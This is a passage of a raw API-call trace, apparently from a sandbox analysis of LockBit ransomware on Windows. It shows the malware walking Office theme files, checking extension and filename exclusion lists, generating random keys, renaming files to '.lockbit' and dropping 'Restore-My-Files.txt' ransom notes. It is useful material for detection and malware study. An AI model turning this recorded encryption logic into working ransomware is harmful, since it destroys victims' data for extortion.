14\\Foundry.thmx.lockbit") returned 74 [0187.569] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Foundry.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\foundry.thmx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0187.574] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0187.574] malloc (_Size=0x40068) returned 0x3f70048 [0187.574] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=63508) returned 1 [0187.574] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0187.574] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0187.574] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0187.574] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0187.575] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0187.575] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0187.575] ReadFile (in: hFile=0x338, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0187.577] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Foundry.thmx.lockbit", NtPathName=0x3d6c510, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Foundry.thmx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0187.577] malloc (_Size=0xaa) returned 0x1fa2ed8 [0187.577] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6c2dc, FileInformation=0x1fa2ed8, Length=0xaa, FileInformationClass=0xa) returned 0x0 [0187.578] free (_Block=0x1fa2ed8) [0187.578] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Foundry.thmx" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14") returned 1 [0187.578] wsprintfW (in: param_1=0x3d6c0c8, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Restore-My-Files.txt") returned 74 [0187.578] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0187.578] FindNextFileW (in: hFindFile=0x55fdf8, lpFindFileData=0x3d6c970 | out: lpFindFileData=0x3d6c970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4b224e00, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5b0c1e0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x4b224e00, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0xd2e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Grid.thmx", cAlternateFileName="GRID~1.THM")) returned 1 [0187.578] lstrcmpiW (lpString1=".", lpString2="Grid.thmx") returned -1 [0187.578] lstrcmpiW (lpString1="..", lpString2="Grid.thmx") returned -1 [0187.578] PathFindExtensionW (pszPath="Grid.thmx") returned=".thmx" [0187.578] lstrcmpiW (lpString1=".386", lpString2=".thmx") returned -1 [0187.578] lstrcmpiW (lpString1=".cmd", lpString2=".thmx") returned -1 [0187.578] lstrcmpiW (lpString1=".exe", lpString2=".thmx") returned -1 [0187.578] lstrcmpiW (lpString1=".ani", lpString2=".thmx") returned -1 [0187.578] lstrcmpiW (lpString1=".adv", lpString2=".thmx") returned -1 [0187.578] lstrcmpiW (lpString1=".theme", lpString2=".thmx") returned -1 [0187.578] lstrcmpiW (lpString1=".msi", lpString2=".thmx") returned -1 [0187.578] lstrcmpiW (lpString1=".msp", lpString2=".thmx") returned -1 [0187.578] lstrcmpiW (lpString1=".com", lpString2=".thmx") returned -1 [0187.578] lstrcmpiW (lpString1=".diagpkg", lpString2=".thmx") returned -1 [0187.579] lstrcmpiW (lpString1=".nls", lpString2=".thmx") returned -1 [0187.579] lstrcmpiW (lpString1=".diagcab", lpString2=".thmx") returned -1 [0187.579] lstrcmpiW (lpString1=".lock", lpString2=".thmx") returned -1 [0187.579] lstrcmpiW (lpString1=".ocx", lpString2=".thmx") returned -1 [0187.579] lstrcmpiW (lpString1=".mpa", lpString2=".thmx") returned -1 [0187.579] lstrcmpiW (lpString1=".cpl", lpString2=".thmx") returned -1 [0187.579] lstrcmpiW (lpString1=".mod", lpString2=".thmx") returned -1 [0187.579] lstrcmpiW (lpString1=".hta", lpString2=".thmx") returned -1 [0187.579] lstrcmpiW (lpString1=".icns", lpString2=".thmx") returned -1 [0187.579] lstrcmpiW (lpString1=".prf", lpString2=".thmx") returned -1 [0187.579] lstrcmpiW (lpString1=".rtp", lpString2=".thmx") returned -1 [0187.579] lstrcmpiW (lpString1=".diagcfg", lpString2=".thmx") returned -1 [0187.579] lstrcmpiW (lpString1=".msstyles", lpString2=".thmx") returned -1 [0187.579] lstrcmpiW (lpString1=".bin", lpString2=".thmx") returned -1 [0187.579] lstrcmpiW (lpString1=".hlp", lpString2=".thmx") returned -1 [0187.579] lstrcmpiW (lpString1=".shs", lpString2=".thmx") returned -1 [0187.579] lstrcmpiW (lpString1=".drv", lpString2=".thmx") returned -1 [0187.579] lstrcmpiW (lpString1=".wpx", lpString2=".thmx") returned 1 [0187.579] lstrcmpiW (lpString1=".bat", lpString2=".thmx") returned -1 [0187.579] lstrcmpiW (lpString1=".rom", lpString2=".thmx") returned -1 [0187.579] lstrcmpiW (lpString1=".msc", lpString2=".thmx") returned -1 [0187.579] lstrcmpiW (lpString1=".spl", lpString2=".thmx") returned -1 [0187.579] lstrcmpiW (lpString1=".ps1", lpString2=".thmx") returned -1 [0187.579] lstrcmpiW (lpString1=".msu", lpString2=".thmx") returned -1 [0187.579] lstrcmpiW (lpString1=".ics", lpString2=".thmx") returned -1 [0187.579] lstrcmpiW (lpString1=".key", lpString2=".thmx") returned -1 [0187.579] lstrcmpiW (lpString1=".mp3", lpString2=".thmx") returned -1 [0187.579] lstrcmpiW (lpString1=".reg", lpString2=".thmx") returned -1 [0187.579] lstrcmpiW (lpString1=".dll", lpString2=".thmx") returned -1 [0187.580] lstrcmpiW (lpString1=".ini", lpString2=".thmx") returned -1 [0187.580] lstrcmpiW (lpString1=".idx", lpString2=".thmx") returned -1 [0187.580] lstrcmpiW (lpString1=".sys", lpString2=".thmx") returned -1 [0187.580] lstrcmpiW (lpString1=".hlp", lpString2=".thmx") returned -1 [0187.580] lstrcmpiW (lpString1=".ico", lpString2=".thmx") returned -1 [0187.580] lstrcmpiW (lpString1=".lnk", lpString2=".thmx") returned -1 [0187.580] lstrcmpiW (lpString1=".rdp", lpString2=".thmx") returned -1 [0187.580] lstrcmpiW (lpString1=".lockbit", lpString2=".thmx") returned -1 [0187.580] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Grid.thmx") returned 1 [0187.580] lstrcmpiW (lpString1="ntldr", lpString2="Grid.thmx") returned 1 [0187.580] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Grid.thmx") returned 1 [0187.580] lstrcmpiW (lpString1="bootsect.bak", lpString2="Grid.thmx") returned -1 [0187.580] lstrcmpiW (lpString1="autorun.inf", lpString2="Grid.thmx") returned -1 [0187.580] lstrcmpiW (lpString1="thumbs.db", lpString2="Grid.thmx") returned 1 [0187.580] lstrcmpiW (lpString1="iconcache.db", lpString2="Grid.thmx") returned 1 [0187.580] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\") returned="" [0187.580] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Grid.thmx") returned=".thmx" [0187.580] lstrcmpiW (lpString1=".rar", lpString2=".thmx") returned -1 [0187.580] lstrcmpiW (lpString1=".zip", lpString2=".thmx") returned 1 [0187.580] lstrcmpiW (lpString1=".7z", lpString2=".thmx") returned -1 [0187.580] lstrcmpiW (lpString1=".ckp", lpString2=".thmx") returned -1 [0187.580] lstrcmpiW (lpString1=".dacpac", lpString2=".thmx") returned -1 [0187.580] lstrcmpiW (lpString1=".db", lpString2=".thmx") returned -1 [0187.580] lstrcmpiW (lpString1=".db-shm", lpString2=".thmx") returned -1 [0187.580] lstrcmpiW (lpString1=".db-wal", lpString2=".thmx") returned -1 [0187.580] lstrcmpiW (lpString1=".db3", lpString2=".thmx") returned -1 [0187.580] lstrcmpiW (lpString1=".dbf", lpString2=".thmx") returned -1 [0187.581] lstrcmpiW (lpString1=".dbc", lpString2=".thmx") returned -1 [0187.581] lstrcmpiW (lpString1=".dbs", lpString2=".thmx") returned -1 [0187.581] lstrcmpiW (lpString1=".dbt", lpString2=".thmx") returned -1 [0187.581] lstrcmpiW (lpString1=".dbv", lpString2=".thmx") returned -1 [0187.581] lstrcmpiW (lpString1=".frm", lpString2=".thmx") returned -1 [0187.581] lstrcmpiW (lpString1=".mdf", lpString2=".thmx") returned -1 [0187.581] lstrcmpiW (lpString1=".mrg", lpString2=".thmx") returned -1 [0187.581] lstrcmpiW (lpString1=".mwb", lpString2=".thmx") returned -1 [0187.581] lstrcmpiW (lpString1=".myd", lpString2=".thmx") returned -1 [0187.581] lstrcmpiW (lpString1=".ndf", lpString2=".thmx") returned -1 [0187.581] lstrcmpiW (lpString1=".qry", lpString2=".thmx") returned -1 [0187.581] lstrcmpiW (lpString1=".sdb", lpString2=".thmx") returned -1 [0187.581] lstrcmpiW (lpString1=".sdf", lpString2=".thmx") returned -1 [0187.581] lstrcmpiW (lpString1=".sql", lpString2=".thmx") returned -1 [0187.581] lstrcmpiW (lpString1=".sqlite", lpString2=".thmx") returned -1 [0187.581] lstrcmpiW (lpString1=".sqlite3", lpString2=".thmx") returned -1 [0187.581] lstrcmpiW (lpString1=".sqlitedb", lpString2=".thmx") returned -1 [0187.581] lstrcmpiW (lpString1=".tmd", lpString2=".thmx") returned 1 [0187.581] wsprintfW (in: param_1=0x3d6beb8, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Grid.thmx.lockbit") returned 71 [0187.581] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Grid.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\grid.thmx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0187.585] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0187.585] malloc (_Size=0x40068) returned 0x3e70008 [0187.585] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=53984) returned 1 [0187.585] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0187.585] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0187.585] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0187.585] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0187.586] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0187.586] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0187.586] ReadFile (in: hFile=0x3cc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0187.595] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Grid.thmx.lockbit", NtPathName=0x3d6c510, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Grid.thmx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0187.595] malloc (_Size=0xa4) returned 0x1fa2ed8 [0187.595] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6c2dc, FileInformation=0x1fa2ed8, Length=0xa4, FileInformationClass=0xa) returned 0x0 [0187.596] free (_Block=0x1fa2ed8) [0187.596] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Grid.thmx" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14") returned 1 [0187.596] wsprintfW (in: param_1=0x3d6c0c8, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Restore-My-Files.txt") returned 74 [0187.596] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0187.597] FindNextFileW (in: hFindFile=0x55fdf8, lpFindFileData=0x3d6c970 | out: lpFindFileData=0x3d6c970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d84a800, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5b32340, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x4d84a800, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x60041, dwReserved0=0x0, dwReserved1=0x0, cFileName="Hardcover.thmx", cAlternateFileName="HARDCO~1.THM")) returned 1 [0187.597] lstrcmpiW (lpString1=".", lpString2="Hardcover.thmx") returned -1 [0187.597] lstrcmpiW (lpString1="..", lpString2="Hardcover.thmx") returned -1 [0187.597] PathFindExtensionW (pszPath="Hardcover.thmx") returned=".thmx" [0187.597] lstrcmpiW (lpString1=".386", lpString2=".thmx") returned -1 [0187.597] lstrcmpiW (lpString1=".cmd", lpString2=".thmx") returned -1 [0187.597] lstrcmpiW (lpString1=".exe", lpString2=".thmx") returned -1 [0187.597] lstrcmpiW (lpString1=".ani", lpString2=".thmx") returned -1 [0187.597] lstrcmpiW (lpString1=".adv", lpString2=".thmx") returned -1 [0187.597] lstrcmpiW (lpString1=".theme", lpString2=".thmx") returned -1 [0187.597] lstrcmpiW (lpString1=".msi", lpString2=".thmx") returned -1 [0187.597] lstrcmpiW (lpString1=".msp", lpString2=".thmx") returned -1 [0187.597] lstrcmpiW (lpString1=".com", lpString2=".thmx") returned -1 [0187.597] lstrcmpiW (lpString1=".diagpkg", lpString2=".thmx") returned -1 [0187.597] lstrcmpiW (lpString1=".nls", lpString2=".thmx") returned -1 [0187.597] lstrcmpiW (lpString1=".diagcab", lpString2=".thmx") returned -1 [0187.597] lstrcmpiW (lpString1=".lock", lpString2=".thmx") returned -1 [0187.597] lstrcmpiW (lpString1=".ocx", lpString2=".thmx") returned -1 [0187.597] lstrcmpiW (lpString1=".mpa", lpString2=".thmx") returned -1 [0187.597] lstrcmpiW (lpString1=".cpl", lpString2=".thmx") returned -1 [0187.597] lstrcmpiW (lpString1=".mod", lpString2=".thmx") returned -1 [0187.597] lstrcmpiW (lpString1=".hta", lpString2=".thmx") returned -1 [0187.597] lstrcmpiW (lpString1=".icns", lpString2=".thmx") returned -1 [0187.597] lstrcmpiW (lpString1=".prf", lpString2=".thmx") returned -1 [0187.597] lstrcmpiW (lpString1=".rtp", lpString2=".thmx") returned -1 [0187.597] lstrcmpiW (lpString1=".diagcfg", lpString2=".thmx") returned -1 [0187.598] lstrcmpiW (lpString1=".msstyles", lpString2=".thmx") returned -1 [0187.598] lstrcmpiW (lpString1=".bin", lpString2=".thmx") returned -1 [0187.598] lstrcmpiW (lpString1=".hlp", lpString2=".thmx") returned -1 [0187.598] lstrcmpiW (lpString1=".shs", lpString2=".thmx") returned -1 [0187.598] lstrcmpiW (lpString1=".drv", lpString2=".thmx") returned -1 [0187.598] lstrcmpiW (lpString1=".wpx", lpString2=".thmx") returned 1 [0187.598] lstrcmpiW (lpString1=".bat", lpString2=".thmx") returned -1 [0187.598] lstrcmpiW (lpString1=".rom", lpString2=".thmx") returned -1 [0187.598] lstrcmpiW (lpString1=".msc", lpString2=".thmx") returned -1 [0187.598] lstrcmpiW (lpString1=".spl", lpString2=".thmx") returned -1 [0187.598] lstrcmpiW (lpString1=".ps1", lpString2=".thmx") returned -1 [0187.598] lstrcmpiW (lpString1=".msu", lpString2=".thmx") returned -1 [0187.598] lstrcmpiW (lpString1=".ics", lpString2=".thmx") returned -1 [0187.598] lstrcmpiW (lpString1=".key", lpString2=".thmx") returned -1 [0187.598] lstrcmpiW (lpString1=".mp3", lpString2=".thmx") returned -1 [0187.598] lstrcmpiW (lpString1=".reg", lpString2=".thmx") returned -1 [0187.598] lstrcmpiW (lpString1=".dll", lpString2=".thmx") returned -1 [0187.598] lstrcmpiW (lpString1=".ini", lpString2=".thmx") returned -1 [0187.598] lstrcmpiW (lpString1=".idx", lpString2=".thmx") returned -1 [0187.598] lstrcmpiW (lpString1=".sys", lpString2=".thmx") returned -1 [0187.598] lstrcmpiW (lpString1=".hlp", lpString2=".thmx") returned -1 [0187.598] lstrcmpiW (lpString1=".ico", lpString2=".thmx") returned -1 [0187.598] lstrcmpiW (lpString1=".lnk", lpString2=".thmx") returned -1 [0187.598] lstrcmpiW (lpString1=".rdp", lpString2=".thmx") returned -1 [0187.598] lstrcmpiW (lpString1=".lockbit", lpString2=".thmx") returned -1 [0187.598] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Hardcover.thmx") returned 1 [0187.599] lstrcmpiW (lpString1="ntldr", lpString2="Hardcover.thmx") returned 1 [0187.599] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Hardcover.thmx") returned 1 [0187.599] lstrcmpiW (lpString1="bootsect.bak", lpString2="Hardcover.thmx") returned -1 [0187.599] lstrcmpiW (lpString1="autorun.inf", lpString2="Hardcover.thmx") returned -1 [0187.599] lstrcmpiW (lpString1="thumbs.db", lpString2="Hardcover.thmx") returned 1 [0187.599] lstrcmpiW (lpString1="iconcache.db", lpString2="Hardcover.thmx") returned 1 [0187.599] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\") returned="" [0187.599] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Hardcover.thmx") returned=".thmx" [0187.599] lstrcmpiW (lpString1=".rar", lpString2=".thmx") returned -1 [0187.599] lstrcmpiW (lpString1=".zip", lpString2=".thmx") returned 1 [0187.599] lstrcmpiW (lpString1=".7z", lpString2=".thmx") returned -1 [0187.599] lstrcmpiW (lpString1=".ckp", lpString2=".thmx") returned -1 [0187.599] lstrcmpiW (lpString1=".dacpac", lpString2=".thmx") returned -1 [0187.599] lstrcmpiW (lpString1=".db", lpString2=".thmx") returned -1 [0187.599] lstrcmpiW (lpString1=".db-shm", lpString2=".thmx") returned -1 [0187.599] lstrcmpiW (lpString1=".db-wal", lpString2=".thmx") returned -1 [0187.599] lstrcmpiW (lpString1=".db3", lpString2=".thmx") returned -1 [0187.599] lstrcmpiW (lpString1=".dbf", lpString2=".thmx") returned -1 [0187.599] lstrcmpiW (lpString1=".dbc", lpString2=".thmx") returned -1 [0187.599] lstrcmpiW (lpString1=".dbs", lpString2=".thmx") returned -1 [0187.599] lstrcmpiW (lpString1=".dbt", lpString2=".thmx") returned -1 [0187.599] lstrcmpiW (lpString1=".dbv", lpString2=".thmx") returned -1 [0187.599] lstrcmpiW (lpString1=".frm", lpString2=".thmx") returned -1 [0187.599] lstrcmpiW (lpString1=".mdf", lpString2=".thmx") returned -1 [0187.599] lstrcmpiW (lpString1=".mrg", lpString2=".thmx") returned -1 [0187.599] lstrcmpiW (lpString1=".mwb", lpString2=".thmx") returned -1 [0187.599] lstrcmpiW (lpString1=".myd", lpString2=".thmx") returned -1 [0187.599] lstrcmpiW (lpString1=".ndf", lpString2=".thmx") returned -1 [0187.600] lstrcmpiW (lpString1=".qry", lpString2=".thmx") returned -1 [0187.600] lstrcmpiW (lpString1=".sdb", lpString2=".thmx") returned -1 [0187.600] lstrcmpiW (lpString1=".sdf", lpString2=".thmx") returned -1 [0187.600] lstrcmpiW (lpString1=".sql", lpString2=".thmx") returned -1 [0187.600] lstrcmpiW (lpString1=".sqlite", lpString2=".thmx") returned -1 [0187.600] lstrcmpiW (lpString1=".sqlite3", lpString2=".thmx") returned -1 [0187.600] lstrcmpiW (lpString1=".sqlitedb", lpString2=".thmx") returned -1 [0187.600] lstrcmpiW (lpString1=".tmd", lpString2=".thmx") returned 1 [0187.600] wsprintfW (in: param_1=0x3d6beb8, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Hardcover.thmx.lockbit") returned 76 [0187.600] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Hardcover.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\hardcover.thmx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0187.601] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0187.601] malloc (_Size=0x40068) returned 0x3d70450 [0187.601] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=393281) returned 1 [0187.602] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0187.602] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0187.602] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0187.602] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0187.602] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0187.602] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0187.602] ReadFile (in: hFile=0x170, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0190.205] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Hardcover.thmx.lockbit", NtPathName=0x3d6c510, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Hardcover.thmx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0190.205] malloc (_Size=0xae) returned 0x1fa2ed8 [0190.206] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6c2dc, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0xc0000008 [0190.206] free (_Block=0x1fa2ed8) [0190.206] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Hardcover.thmx" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14") returned 1 [0190.206] wsprintfW (in: param_1=0x3d6c0c8, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Restore-My-Files.txt") returned 74 [0190.206] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0190.207] FindNextFileW (in: hFindFile=0x55fdf8, lpFindFileData=0x3d6c970 | out: lpFindFileData=0x3d6c970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ad15600, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5b584a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x7ad15600, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x3becb, dwReserved0=0x0, dwReserved1=0x0, cFileName="Horizon.thmx", cAlternateFileName="HORIZO~1.THM")) returned 1 [0190.207] lstrcmpiW (lpString1=".", lpString2="Horizon.thmx") returned -1 [0190.207] lstrcmpiW (lpString1="..", lpString2="Horizon.thmx") returned -1 [0190.207] PathFindExtensionW (pszPath="Horizon.thmx") returned=".thmx" [0190.207] lstrcmpiW (lpString1=".386", lpString2=".thmx") returned -1 [0190.207] lstrcmpiW (lpString1=".cmd", lpString2=".thmx") returned -1 [0190.207] lstrcmpiW (lpString1=".exe", lpString2=".thmx") returned -1 [0190.207] lstrcmpiW (lpString1=".ani", lpString2=".thmx") returned -1 [0190.207] lstrcmpiW (lpString1=".adv", lpString2=".thmx") returned -1 [0190.207] lstrcmpiW (lpString1=".theme", lpString2=".thmx") returned -1 [0190.207] lstrcmpiW (lpString1=".msi", lpString2=".thmx") returned -1 [0190.207] lstrcmpiW (lpString1=".msp", lpString2=".thmx") returned -1 [0190.207] lstrcmpiW (lpString1=".com", lpString2=".thmx") returned -1 [0190.207] lstrcmpiW (lpString1=".diagpkg", lpString2=".thmx") returned -1 [0190.207] lstrcmpiW (lpString1=".nls", lpString2=".thmx") returned -1 [0190.207] lstrcmpiW (lpString1=".diagcab", lpString2=".thmx") returned -1 [0190.207] lstrcmpiW (lpString1=".lock", lpString2=".thmx") returned -1 [0190.207] lstrcmpiW (lpString1=".ocx", lpString2=".thmx") returned -1 [0190.208] lstrcmpiW (lpString1=".mpa", lpString2=".thmx") returned -1 [0190.208] lstrcmpiW (lpString1=".cpl", lpString2=".thmx") returned -1 [0190.208] lstrcmpiW (lpString1=".mod", lpString2=".thmx") returned -1 [0190.208] lstrcmpiW (lpString1=".hta", lpString2=".thmx") returned -1 [0190.208] lstrcmpiW (lpString1=".icns", lpString2=".thmx") returned -1 [0190.208] lstrcmpiW (lpString1=".prf", lpString2=".thmx") returned -1 [0190.208] lstrcmpiW (lpString1=".rtp", lpString2=".thmx") returned -1 [0190.208] lstrcmpiW (lpString1=".diagcfg", lpString2=".thmx") returned -1 [0190.208] lstrcmpiW (lpString1=".msstyles", lpString2=".thmx") returned -1 [0190.208] lstrcmpiW (lpString1=".bin", lpString2=".thmx") returned -1 [0190.208] lstrcmpiW (lpString1=".hlp", lpString2=".thmx") returned -1 [0190.208] lstrcmpiW (lpString1=".shs", lpString2=".thmx") returned -1 [0190.208] lstrcmpiW (lpString1=".drv", lpString2=".thmx") returned -1 [0190.208] lstrcmpiW (lpString1=".wpx", lpString2=".thmx") returned 1 [0190.208] lstrcmpiW (lpString1=".bat", lpString2=".thmx") returned -1 [0190.208] lstrcmpiW (lpString1=".rom", lpString2=".thmx") returned -1 [0190.208] lstrcmpiW (lpString1=".msc", lpString2=".thmx") returned -1 [0190.208] lstrcmpiW (lpString1=".spl", lpString2=".thmx") returned -1 [0190.208] lstrcmpiW (lpString1=".ps1", lpString2=".thmx") returned -1 [0190.208] lstrcmpiW (lpString1=".msu", lpString2=".thmx") returned -1 [0190.208] lstrcmpiW (lpString1=".ics", lpString2=".thmx") returned -1 [0190.208] lstrcmpiW (lpString1=".key", lpString2=".thmx") returned -1 [0190.208] lstrcmpiW (lpString1=".mp3", lpString2=".thmx") returned -1 [0190.208] lstrcmpiW (lpString1=".reg", lpString2=".thmx") returned -1 [0190.208] lstrcmpiW (lpString1=".dll", lpString2=".thmx") returned -1 [0190.208] lstrcmpiW (lpString1=".ini", lpString2=".thmx") returned -1 [0190.209] lstrcmpiW (lpString1=".idx", lpString2=".thmx") returned -1 